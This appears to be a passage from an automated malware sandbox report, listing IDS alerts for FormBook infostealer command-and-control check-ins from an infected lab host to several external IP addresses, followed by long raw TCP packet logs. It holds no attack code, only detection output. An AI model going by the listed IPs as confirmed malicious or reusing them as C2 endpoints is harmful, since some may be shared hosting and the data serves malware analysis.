02/28/24-15:50:09.297665	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	50275	80	192.168.11.20	172.67.130.3
02/28/24-15:46:23.938435	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	50249	80	192.168.11.20	84.32.84.32
02/28/24-15:50:30.859256	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	50282	80	192.168.11.20	198.54.117.242
02/28/24-15:45:09.327283	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	50231	80	192.168.11.20	82.180.172.14
02/28/24-15:46:44.457202	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	50255	80	192.168.11.20	62.149.128.45
02/28/24-15:47:29.845065	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	50267	80	192.168.11.20	109.234.166.81
02/28/24-15:50:22.712674	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	50280	80	192.168.11.20	82.180.172.14
02/28/24-15:45:23.096947	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	50236	80	192.168.11.20	198.54.117.242
02/28/24-15:50:17.338767	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	50278	80	192.168.11.20	82.180.172.14
02/28/24-15:46:53.641836	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	50257	80	192.168.11.20	91.195.240.19
02/28/24-15:51:05.030309	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	50289	80	192.168.11.20	91.195.240.19
02/28/24-15:45:46.996646	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	50243	80	192.168.11.20	198.177.123.106
02/28/24-15:46:35.925522	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	50252	80	192.168.11.20	62.149.128.45
02/28/24-15:45:31.396166	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	50239	80	192.168.11.20	198.54.117.242
02/28/24-15:50:03.923707	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	50273	80	192.168.11.20	172.67.130.3
02/28/24-15:46:29.642379	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	50251	80	192.168.11.20	84.32.84.32
02/28/24-15:50:50.810014	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	50288	80	192.168.11.20	198.177.123.106
02/28/24-15:46:06.307989	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	50244	80	192.168.11.20	194.191.24.38
02/28/24-15:50:14.644783	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	50277	80	192.168.11.20	82.180.172.14
02/28/24-15:46:38.772727	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	50253	80	192.168.11.20	62.149.128.45
02/28/24-15:46:50.812331	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	50256	80	192.168.11.20	91.195.240.19
02/28/24-15:50:42.624191	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	50285	80	192.168.11.20	198.177.123.106
02/28/24-15:46:21.093451	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	50248	80	192.168.11.20	84.32.84.32
02/28/24-15:50:06.611884	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	50274	80	192.168.11.20	172.67.130.3
02/28/24-15:46:59.299144	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	50259	80	192.168.11.20	91.195.240.19
02/28/24-15:46:14.855634	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	50247	80	192.168.11.20	194.191.24.38
02/28/24-15:47:21.322045	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	50264	80	192.168.11.20	109.234.166.81
02/28/24-15:44:58.700957	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	50230	80	192.168.11.20	172.67.130.3
02/28/24-15:45:41.540083	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	50241	80	192.168.11.20	198.177.123.106

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 28, 2024 15:43:33.831882954 CET	50224	443	192.168.11.20	142.250.68.46
Feb 28, 2024 15:43:33.831974030 CET	443	50224	142.250.68.46	192.168.11.20
Feb 28, 2024 15:43:33.832161903 CET	50224	443	192.168.11.20	142.250.68.46
Feb 28, 2024 15:43:33.855051994 CET	50224	443	192.168.11.20	142.250.68.46
Feb 28, 2024 15:43:33.855109930 CET	443	50224	142.250.68.46	192.168.11.20
Feb 28, 2024 15:43:34.233516932 CET	443	50224	142.250.68.46	192.168.11.20
Feb 28, 2024 15:43:34.234031916 CET	50224	443	192.168.11.20	142.250.68.46
Feb 28, 2024 15:43:34.234473944 CET	443	50224	142.250.68.46	192.168.11.20
Feb 28, 2024 15:43:34.234740973 CET	50224	443	192.168.11.20	142.250.68.46
Feb 28, 2024 15:43:34.292738914 CET	50224	443	192.168.11.20	142.250.68.46
Feb 28, 2024 15:43:34.292835951 CET	443	50224	142.250.68.46	192.168.11.20
Feb 28, 2024 15:43:34.294637918 CET	443	50224	142.250.68.46	192.168.11.20
Feb 28, 2024 15:43:34.294852972 CET	50224	443	192.168.11.20	142.250.68.46
Feb 28, 2024 15:43:34.297715902 CET	50224	443	192.168.11.20	142.250.68.46
Feb 28, 2024 15:43:34.340678930 CET	443	50224	142.250.68.46	192.168.11.20
Feb 28, 2024 15:43:34.588912964 CET	443	50224	142.250.68.46	192.168.11.20
Feb 28, 2024 15:43:34.589135885 CET	50224	443	192.168.11.20	142.250.68.46
Feb 28, 2024 15:43:34.589205027 CET	443	50224	142.250.68.46	192.168.11.20
Feb 28, 2024 15:43:34.589272976 CET	443	50224	142.250.68.46	192.168.11.20
Feb 28, 2024 15:43:34.589462042 CET	50224	443	192.168.11.20	142.250.68.46
Feb 28, 2024 15:43:34.590923071 CET	50224	443	192.168.11.20	142.250.68.46
Feb 28, 2024 15:43:34.590985060 CET	443	50224	142.250.68.46	192.168.11.20
Feb 28, 2024 15:43:34.811440945 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:34.811537981 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:34.811800957 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:34.812096119 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:34.812149048 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:35.147353888 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:35.147582054 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:35.151319981 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:35.151331902 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:35.151604891 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:35.151741028 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:35.151962042 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:35.196594954 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.053179026 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.053483963 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.063671112 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.063855886 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.063958883 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.085586071 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.085793972 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.085820913 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.096520901 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.096678019 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.209001064 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.209140062 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.209167004 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.209398985 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.214344978 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.214590073 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.214616060 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.214895010 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.225296974 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.225615025 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.225640059 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.225817919 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.236243963 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.236402035 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.236427069 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.236671925 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.247219086 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.247426033 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.247453928 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.247632980 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.258174896 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.258378029 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.258404016 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.258553028 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.269206047 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.269448042 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.269473076 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.269654036 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.280086994 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.280313969 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.280339003 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.280512094 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.290864944 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.291110039 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.291136980 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.291425943 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.301630020 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.301831961 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.301856995 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.302042961 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.312376022 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.312621117 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.312648058 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.312913895 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.323105097 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.323285103 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.323312044 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.323506117 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.333867073 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.334076881 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.339251041 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.339446068 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.339473009 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.339665890 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.364851952 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.365204096 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.365219116 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.365443945 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.370235920 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.370449066 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.370467901 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.370696068 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.380536079 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.380844116 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.380898952 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.381181955 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.389914989 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.390115976 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.390173912 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.390389919 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.398566008 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.398746967 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.398807049 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.399022102 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.407151937 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.407380104 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.407457113 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.407663107 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.415245056 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.415426970 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.415487051 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.415731907 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.422837019 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.423019886 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.423079014 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.423291922 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.430342913 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.430522919 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.430583000 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.430799961 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.437896013 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.438070059 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.438129902 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.438365936 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.445447922 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.445646048 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.445705891 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.445940018 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.453006029 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.453217983 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.456804991 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.456973076 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.457050085 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.457257032 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.457310915 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.457520008 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.464330912 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.464627981 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.464689970 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.464977026 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.471909046 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.472068071 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.472126961 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.472361088 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.479209900 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.479382038 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.479441881 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.479665041 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.485970974 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.486149073 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.486205101 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.486408949 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.492542028 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.492794037 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.492851019 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.493174076 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.498949051 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.499126911 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.499186993 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.499394894 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.505669117 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.505829096 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.505906105 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.506051064 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.506089926 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.506366014 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.519886971 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.520112038 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.520181894 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.520225048 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.520256042 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.520276070 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.520531893 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.524805069 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.525207043 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.525264025 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.525584936 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.531007051 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.531271935 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.531330109 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.531578064 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.537245035 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.537492990 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.539243937 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.539717913 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.539779902 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.540007114 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.543081999 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.543519020 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.543576956 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.543792963 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.547005892 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.547238111 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.547311068 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.547511101 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.550889969 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.551228046 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.551287889 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.551546097 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.554856062 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.555073977 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.555140972 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.555393934 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.558635950 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.558893919 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.558954000 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.559127092 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.562608004 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.562858105 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.562916040 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.563174963 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.566376925 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.566623926 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.566690922 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.566971064 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.570023060 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.570586920 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.570647001 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.571118116 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.573932886 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.574162006 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.574220896 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.574472904 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.577795029 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.578206062 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.578272104 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.578553915 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.581449986 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.581722021 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.581777096 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.582000017 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.585251093 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.585504055 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.587189913 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.587438107 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.587501049 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.587706089 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.590913057 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.591099977 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.591177940 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.591379881 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.594667912 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.595012903 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.595069885 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.595437050 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.598404884 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.598587036 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.598644018 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.598834991 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.601980925 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.602138042 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.602212906 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.602463007 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.605561018 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.605819941 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.605879068 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.606122017 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.609415054 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.609644890 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.609700918 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.609895945 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.612730026 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.612953901 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.613014936 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.613292933 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.616235018 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.616446018 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.616504908 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.616729021 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.619910002 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.620163918 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.620218992 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.620421886 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.623296976 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.623472929 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.623545885 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.623830080 CET	50225	443	192.168.11.20	142.250.188.225
